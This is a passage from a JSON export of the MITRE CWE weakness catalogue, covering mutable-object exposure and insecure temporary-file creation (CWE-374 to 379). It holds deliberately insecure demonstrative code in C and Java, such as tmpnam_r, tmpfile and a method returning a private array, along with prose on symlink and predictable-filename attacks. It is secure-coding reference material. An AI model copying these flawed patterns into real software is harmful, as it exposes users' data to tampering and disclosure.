execution.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Memory","Note":"Potentially data could be tampered with by another function which should not have been tampered with."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Pass in data which should not be altered as constant or immutable."},{"Phase":"Implementation","Description":"Clone all mutable data before passing it into an external function . This is the preferred mitigation. This way, regardless of what changes are made to the data, a valid copy is retained for use by the class."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"private:public:","xhtml:div":[{"#text":"int foo;complexType bar;String baz;otherClass externalClass;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},{"#text":"void doStuff() {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"externalClass.doOtherStuff(foo, bar, baz)","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":["",""]}},"Body_Text":"In this example, bar and baz will be passed by reference to doOtherStuff() which may change them."},{"Intro_Text":"In the following Java example, the BookStore class manages the sale of books in a bookstore, this class includes the member objects for the bookstore inventory and sales database manager classes. The BookStore class includes a method for updating the sales database and inventory when a book is sold. This method retrieves a Book object from the bookstore inventory object using the supplied ISBN number for the book class, then calls a method for the sales object to update the sales information and then calls a method for the inventory object to update inventory for the BookStore.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BookStore {}public class Book {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private BookStoreInventory inventory;private SalesDBManager sales;...public BookStore() {}public void updateSalesAndInventoryForBookSold(String bookISBN) {}...","xhtml:br":["","","","","","",""],"xhtml:i":["// constructor for BookStore","// other BookStore methods"],"xhtml:div":[{"#text":"this.inventory = new BookStoreInventory();this.sales = new SalesDBManager();...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Book book = inventory.getBookWithISBN(bookISBN);sales.updateSalesInformation(book);inventory.updateInventory(book);","xhtml:br":["","","","","",""],"xhtml:i":["// Get book object from inventory using ISBN","// update sales information for book sold","// update inventory"]}}]}},{"#text":"private String title;private String author;private String isbn;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:i":"// Book object constructors and get/set methods"}],"xhtml:br":""}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"...public void updateSalesAndInventoryForBookSold(String bookISBN) {}...","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Book book = inventory.getBookWithISBN(bookISBN);Book bookSold = (Book) book.clone();sales.updateSalesInformation(bookSold);inventory.updateInventory(book);","xhtml:br":["","","","","","","",""],"xhtml:i":["// Get book object from inventory using ISBN","// Create copy of book object to make sure contents are not changed","// update sales information for book sold","// update inventory"]}}}}],"Body_Text":["However, in this example the Book object that is retrieved and passed to the method of the sales object could have its contents modified by the method. This could cause unexpected results when the book object is sent to the method for the inventory object to update the inventory.","In the Java programming language arguments to methods are passed by value, however in the case of objects a reference to the object is passed by value to the method. When an object reference is passed as a method argument a copy of the object reference is made within the method and therefore both references point to the same object. This allows the contents of the object to be modified by the method that holds the copy of the object reference. [REF-374]","In this case the contents of the Book object could be modified by the method of the sales object prior to the call to update the inventory.","To prevent the contents of the Book object from being modified, a copy of the Book object should be made before the method call to the sales object. In the following example a copy of the Book object is made using the clone() method and the copy of the Book object is passed to the method of the sales object. This will prevent any changes being made to the original Book object."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Passing mutable objects to an untrusted method"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ04-J","Entry_Name":"Provide mutable classes with copy functionality to safely allow passing instances to untrusted code"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-374"}},{"attr":{"@_External_Reference_ID":"REF-375"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Name, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Mutable Objects Passed by Reference","attr":{"@_Date":"2010-06-21"}}}},"375":{"attr":{"@_ID":"375","@_Name":"Returning a Mutable Object to an Untrusted Caller","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Sending non-cloned mutable data as a return value may result in that data being altered or deleted by the calling function.","Extended_Description":"In situations where functions return references to mutable data, it is possible that the external code which called the function may make changes to the data sent. If this data was not previously cloned, the class will then be using modified data which may violate assumptions about its internal state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":"Modify Memory","Note":"Potentially data could be tampered with by another function which should not have been tampered with."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Declare returned data which should not be altered as constant or immutable."},{"Phase":"Implementation","Description":"Clone all mutable data before returning references to it. This is the preferred mitigation. This way, regardless of what changes are made to the data, a valid copy is retained for use by the class."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This class has a private list of patients, but provides a way to see the list :","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class ClinicalTrial {}","xhtml:div":{"#text":"private PatientClass[] patientList = new PatientClass[50];public getPatients(...){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"return patientList;","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"While this code only means to allow reading of the patient list, the getPatients() method returns a reference to the class\'s original patient list instead of a reference to a copy of the list. Any caller of this method can arbitrarily modify the contents of the patient list even though it is a private member of the class."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Mutable object returned"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ04-J","Entry_Name":"Provide mutable classes with copy functionality to safely allow passing instances to untrusted code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ05-J","Entry_Name":"Defensively copy private mutable class members before returning their references"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP34-PL","Entry_Name":"Do not modify $_ in list or sorting functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Passing Mutable Objects to an Untrusted Method","attr":{"@_Date":"2010-09-27"}}}},"377":{"attr":{"@_ID":"377","@_Name":"Insecure Temporary File","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Creating and using insecure temporary files can leave application and system data vulnerable to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code uses a temporary file for storing intermediate data gathered from the network before it is processed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (tmpnam_r(filename)) {}...","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"FILE* tmp = fopen(filename,\\"wb+\\");while((recv(sock,recvbuf,DATA_SIZE, 0) &gt; 0)&amp;(amt!=0)) amt = fwrite(recvbuf,1,DATA_SIZE,tmp);","xhtml:br":["",""]}},"xhtml:br":""}},"Body_Text":"This otherwise unremarkable code is vulnerable to a number of different attacks because it relies on an insecure method for creating temporary files. The vulnerabilities introduced by this function and others are described in the following sections. The most egregious security problems related to temporary file creation have occurred on Unix-based operating systems, but Windows applications have parallel risks. This section includes a discussion of temporary file creation on both Unix and Windows systems. Methods and behaviors can vary between systems, but the fundamental risks introduced by each are reasonably constant."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Insecure Temporary File"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON33-C","Entry_Name":"Avoid race conditions when using library functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO00-J","Entry_Name":"Do not operate on files in shared directories"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"155"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 23, &#34;Creating Temporary Files Securely&#34; Page 682"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Temporary Files&#34;, Page 538"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;File Squatting&#34;, Page 662"}}]},"Notes":{"Note":{"attr":{"@_Type":"Other"},"xhtml:p":["Applications require temporary files so frequently that many different mechanisms exist for creating them in the C Library and Windows(R) API. Most of these functions are vulnerable to various forms of attacks.","The functions designed to aid in the creation of temporary files can be broken into two groups based whether they simply provide a filename or actually open a new file. - Group 1: \\"Unique\\" Filenames: The first group of C Library and WinAPI functions designed to help with the process of creating temporary files do so by generating a unique file name for a new temporary file, which the program is then supposed to open. This group includes C Library functions like tmpnam(), tempnam(), mktemp() and their C++ equivalents prefaced with an _ (underscore) as well as the GetTempFileName() function from the Windows API. This group of functions suffers from an underlying race condition on the filename chosen. Although the functions guarantee that the filename is unique at the time it is selected, there is no mechanism to prevent another process or an attacker from creating a file with the same name after it is selected but before the application attempts to open the file. Beyond the risk of a legitimate collision caused by another call to the same function, there is a high probability that an attacker will be able to create a malicious collision because the filenames generated by these functions are not sufficiently randomized to make them difficult to guess. If a file with the selected name is created, then depending on how the file is opened the existing contents or access permissions of the file may remain intact. If the existing contents of the file are malicious in nature, an attacker may be able to inject dangerous data into the application when it reads data back from the temporary file. If an attacker pre-creates the file with relaxed access permissions, then data stored in the temporary file by the application may be accessed, modified or corrupted by an attacker. On Unix based systems an even more insidious attack is possible if the attacker pre-creates the file as a link to another important file. Then, if the application truncates or writes data to the file, it may unwittingly perform damaging operations for the attacker. This is an especially serious threat if the program operates with elevated permissions. Finally, in the best case the file will be opened with the a call to open() using the O_CREAT and O_EXCL flags or to CreateFile() using the CREATE_NEW attribute, which will fail if the file already exists and therefore prevent the types of attacks described above. However, if an attacker is able to accurately predict a sequence of temporary file names, then the application may be prevented from opening necessary temporary storage causing a denial of service (DoS) attack. This type of attack would not be difficult to mount given the small amount of randomness used in the selection of the filenames generated by these functions. - Group 2: \\"Unique\\" Files: The second group of C Library functions attempts to resolve some of the security problems related to temporary files by not only generating a unique file name, but also opening the file. This group includes C Library functions like tmpfile() and its C++ equivalents prefaced with an _ (underscore), as well as the slightly better-behaved C Library function mkstemp(). The tmpfile() style functions construct a unique filename and open it in the same way that fopen() would if passed the flags \\"wb+\\", that is, as a binary file in read/write mode. If the file already exists, tmpfile() will truncate it to size zero, possibly in an attempt to assuage the security concerns mentioned earlier regarding the race condition that exists between the selection of a supposedly unique filename and the subsequent opening of the selected file. However, this behavior clearly does not solve the function\'s security problems. First, an attacker can pre-create the file with relaxed access-permissions that will likely be retained by the file opened by tmpfile(). Furthermore, on Unix based systems if the attacker pre-creates the file as a link to another important file, the application may use its possibly elevated permissions to truncate that file, thereby doing damage on behalf of the attacker. Finally, if tmpfile() does create a new file, the access permissions applied to that file will vary from one operating system to another, which can leave application data vulnerable even if an attacker is unable to predict the filename to be used in advance. Finally, mkstemp() is a reasonably safe way create temporary files. It will attempt to create and open a unique file based on a filename template provided by the user combined with a series of randomly generated characters. If it is unable to create such a file, it will fail and return -1. On modern systems the file is opened using mode 0600, which means the file will be secure from tampering unless the user explicitly changes its access permissions. However, mkstemp() still suffers from the use of predictable file names and can leave an application vulnerable to denial of service attacks if an attacker causes mkstemp() to fail by predicting and pre-creating the filenames to be used."]}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"}]}},"378":{"attr":{"@_ID":"378","@_Name":"Creation of Temporary File With Insecure Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Opening temporary files without appropriate measures or controls can leave the file, its contents and any function that it impacts vulnerable to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"377","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the temporary file can be read by the attacker, sensitive information may be in that file which could be revealed."},{"Scope":["Authorization","Other"],"Impact":"Other","Note":"If that file can be written to by the attacker, the file might be moved into a place to which the attacker does not have access. This will allow the attacker to gain selective resource access-control privileges."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Depending on the data stored in the temporary file, there is the potential for an attacker to gain an additional input vector which is trusted as non-malicious. It may be possible to make arbitrary changes to data structures, user information, or even process ownership."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Many contemporary languages have functions which properly handle this condition. Older C temp file functions are especially susceptible."},{"Phase":"Implementation","Description":"Ensure that you use proper file permissions. This can be achieved by using a safe temp file function. Temporary files should be writable and readable only by the process that owns the file."},{"Phase":"Implementation","Description":"Randomize temporary file names. This can also be achieved by using a safe temp-file function. This will ensure that temporary files will not be created in predictable places."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-139"},"Intro_Text":"In the following code examples a temporary file is created and written to.  After using the temporary file, the file is closed and deleted from the file system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"FILE *stream;if( (stream = tmpfile()) == NULL ) {}...// remove tmp filermtmp();","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"perror(\\"Could not open new temporary file\\\\n\\");return (-1);","xhtml:br":["",""]}},"xhtml:i":"// write data to tmp file"}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":{"#text":"File temp = File.createTempFile(\\"pattern\\", \\".suffix\\");temp.deleteOnExit();BufferedWriter out = new BufferedWriter(new FileWriter(temp));out.write(\\"aString\\");out.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},"xhtml:br":["",""]}}],"Body_Text":["However, within this C/C++ code the method tmpfile() is used to create and open the temp file. The tmpfile() method works the same way as the fopen() method would with read/write permission, allowing attackers to read potentially sensitive information contained in the temp file or modify the contents of the file.","Similarly, the createTempFile() method used in the Java code creates a temp file that may be readable and writable to all users.","Additionally both methods used above place the file into a default directory. On UNIX systems the default directory is usually \\"/tmp\\" or \\"/var/tmp\\" and on Windows systems the default directory is usually \\"C:\\\\\\\\Windows\\\\\\\\Temp\\", which may be easily accessible to attackers, possibly enabling them to read and modify the contents of the temp file."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper temp file opening"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Improper Temporary File Opening","attr":{"@_Date":"2008-04-11"}}}},"379":{"attr":{"@_ID":"379","@_Name":"Creation of Temporary File in Directory with Insecure Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software creates a temporary file in a directory whose permissions allow unintended actors to determine the file\'s existence or otherwise access that file.","Extended_Description":"On some operating systems, the fact that the temporary file exists may be apparent to any user with sufficient privileges to access that directory. Since the file is visible, the application that is using the temporary file could be known. If one has access to list the processes on the system, the attacker has gained information about what the user is doing at that time. By correlating this with the applications the user is running, an attacker could potentially discover what a user\'s actions are. From this, higher levels of security could be breached.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"377","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Since the file is visible and the application which is using the temp file could be known, the attacker has gained information about what the user is doing at that time."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Many contemporary languages have functions which properly handle this condition. Older C temp file functions are especially susceptible."},{"Phase":"Implementation","Description":"Try to store sensitive tempfiles in a directory which is not world readable -- i.e., per-user directories."},{"Phase":"Implementation","Description":"Avoid using vulnerable temp file functions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-139"},"Intro_Text":"In the following code examples a temporary file is created and written to.  After using the temporary file, the file is closed and deleted from the file system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"FILE *stream;if( (stream = tmpfile()) == NULL ) {}...// remove tmp filermtmp();","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"perror(\\"Could not open new temporary file\\\\n\\");return (-1);","xhtml:br":["",""]}},"xhtml:i":"// write data to tmp file"}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":{"#text":"File temp = File.createTempFile(\\"pattern\\", \\".suffix\\");temp.deleteOnExit();BufferedWriter out = new BufferedWriter(new FileWriter(temp));out.write(\\"aString\\");out.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},"xhtml:br":["",""]}}],"Body_Text":["However, within this C/C++ code the method tmpfile() is used to create and open the temp file. The tmpfile() method works the same way as the fopen() method would with read/write permission, allowing attackers to read potentially sensitive information contained in the temp file or modify the contents of the file.","Similarly, the createTempFile() method used in the Java code creates a temp file that may be readable and writable to all users.","Additionally both methods used above place the file into a default directory. On UNIX systems the default directory is usually \\"/tmp\\" or \\"/var/tmp\\" and on Windows systems the default directory is usually \\"C:\\\\\\\\Windows\\\\\\\\Temp\\", which may be easily accessible to attackers, possibly enabling them to read and modify the contents of the temp file."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Guessed or visible temporary file"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO15-C","Entry_Name":"Ensure that file operations are performed in a secure directory"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Temporary Files&#34;, Page 538"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 